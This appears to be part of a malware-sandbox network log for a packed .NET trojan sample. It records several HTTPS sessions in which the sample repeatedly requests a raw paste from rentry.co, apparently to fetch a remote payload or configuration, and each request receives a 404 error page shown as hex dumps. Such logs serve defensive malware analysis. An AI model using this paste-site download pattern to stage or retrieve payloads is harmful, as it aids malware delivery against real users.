                                                                                        2024-10-18 10:44:27 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:27 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:44:27 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:27 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 65 33 38 62 30 30 34 38 35 62 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 32 4e 79 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eee38b00485b',t:'MTcyOTI0ODI2Ny4wMDAw
                                                                                        2024-10-18 10:44:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        89192.168.2.660753104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:27 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:28 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:28 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K3BzK1If%2FPhMVUlLvPAolCg4zs1LrnvjIB8oTdPkz6ruZ3Is44%2BOCTwq3SgiZs9zjsuGIIcg2Df7qUnhiWeQlnq1KNpLQPaxzeGC%2BPd0s3MjmG0MJtLgFmGn8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eee9ba252cc6-DFW
                                                                                        2024-10-18 10:44:28 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:28 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:44:28 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:28 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 65 39 62 61 32 35 32 63 63 36 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 32 4f 43 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eee9ba252cc6',t:'MTcyOTI0ODI2OC4wMDAwMD
                                                                                        2024-10-18 10:44:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        90192.168.2.660754104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:28 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:29 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:28 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gc6pL0MTbAlr7v2bE3dOZxgv9LyhZCDZItFbEQ3s6yqnAQnKqDRWCdLHmKm40D1BzTyhK5VCJrO%2BeMKi5NNB3%2BtmvWrW7IPb0yUp1LLDcWpcHO6ZUQ3iWrJZQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eeeff84c6bcb-DFW
                                                                                        2024-10-18 10:44:29 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:29 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:44:29 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:44:29 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 65 66 66 38 34 63 36 62 63 62 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 32 4f 43 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eeeff84c6bcb',t:'MTcyOTI0ODI2OC4wMDAwMDA=
                                                                                        2024-10-18 10:44:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        91192.168.2.660755104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:29 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:30 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:30 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GUApYDG0RIebHCxLET8wv81VQOIXfrGIW7Hnn%2BWuVZwssFrpXSuNpmgTrYPYjz7OMu%2FgqURhxT10y7knslq%2B3jH8bvsHu%2BKjsq3Y5MKKqo4ZboJja0T9iPrdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eef62db31448-DFW
                                                                                        2024-10-18 10:44:30 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:30 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:44:30 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:30 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 66 36 32 64 62 33 31 34 34 38 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 33 4d 43 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eef62db31448',t:'MTcyOTI0ODI3MC4wMDAw
                                                                                        2024-10-18 10:44:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        92192.168.2.660757104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:31 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:31 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:31 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqtWsYuJ2ojEqB%2Fu9ltrCzkaBjc%2BTMEhgtmCc8l0vYqJKPP5sMfWOvk21z5QNMWynTgCARdCjN7FxK5aCSSMFN5JXiodMImsIjgL%2B%2Fv8MWQRbiE6lHrjqem5TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eeff4f5ee84b-DFW
